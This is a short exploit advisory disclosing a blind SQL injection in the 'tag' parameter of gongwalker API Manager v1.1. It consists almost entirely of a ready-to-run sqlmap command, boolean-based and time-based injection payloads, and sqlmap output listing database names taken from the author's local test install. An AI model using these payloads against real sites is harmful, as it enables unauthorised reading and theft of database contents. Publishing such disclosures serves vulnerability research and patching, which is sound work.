gongwalker API Manager v1.1- Blind SQL Injection
# Exploit Title: gongwalker API Manager v1.1 - Blind SQL Injection# Date: 2016-01-25# Exploit Author: HaHwul# Exploit Author Blog: www.hahwul.com# Vendor Homepage: https://github.com/gongwalker/ApiManager# Software Link: https://github.com/gongwalker/ApiManager.git# Version: v1.1# Tested on: Debian# =================== Vulnerability Description =================== #
Api Manager's index.php used tag parameters is vulnerable
http://127.0.0.1/vul_test/ApiManager/index.php?act=api&tag=1# ========================= SqlMap Query ========================== #
sqlm -u "http://127.0.0.1/vul_test/ApiManager/index.php?act=api&tag=1"--level 4--dbs --no-cast -p tag
# ================= SqlMap Result(get My Test DB) ================= #
Parameter: tag (GET)
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: act=api&tag=1' RLIKE (SELECT (CASE WHEN (9435=9435) THEN 1 ELSE 0x28 END)) AND 'uUNb'='uUNb
Type: AND/OR time-based blind
Title: MySQL >5.0.11 AND time-based blind (SELECT)
Payload: act=api&tag=1' AND (SELECT * FROM (SELECT(SLEEP(5)))qakZ) AND 'cSPF'='cSPF
---[21:14:21][INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.10
back-end DBMS: MySQL 5.0.11[21:14:21][INFO] fetching database names
[21:14:21][INFO] fetching number of databases
[21:14:21][INFO] resumed:25[21:14:21][INFO] resumed: information_schema
[21:14:21][INFO] resumed: "
[21:14:21][INFO] resumed:""[21:14:21][INFO] resumed: '
[21:14:21][INFO] resumed:''[21:14:21][INFO] resumed:'''
[21:14:21][INFO] resumed: api
[21:14:21][INFO] resumed: blackcat
[21:14:21][INFO] resumed: edusec
...
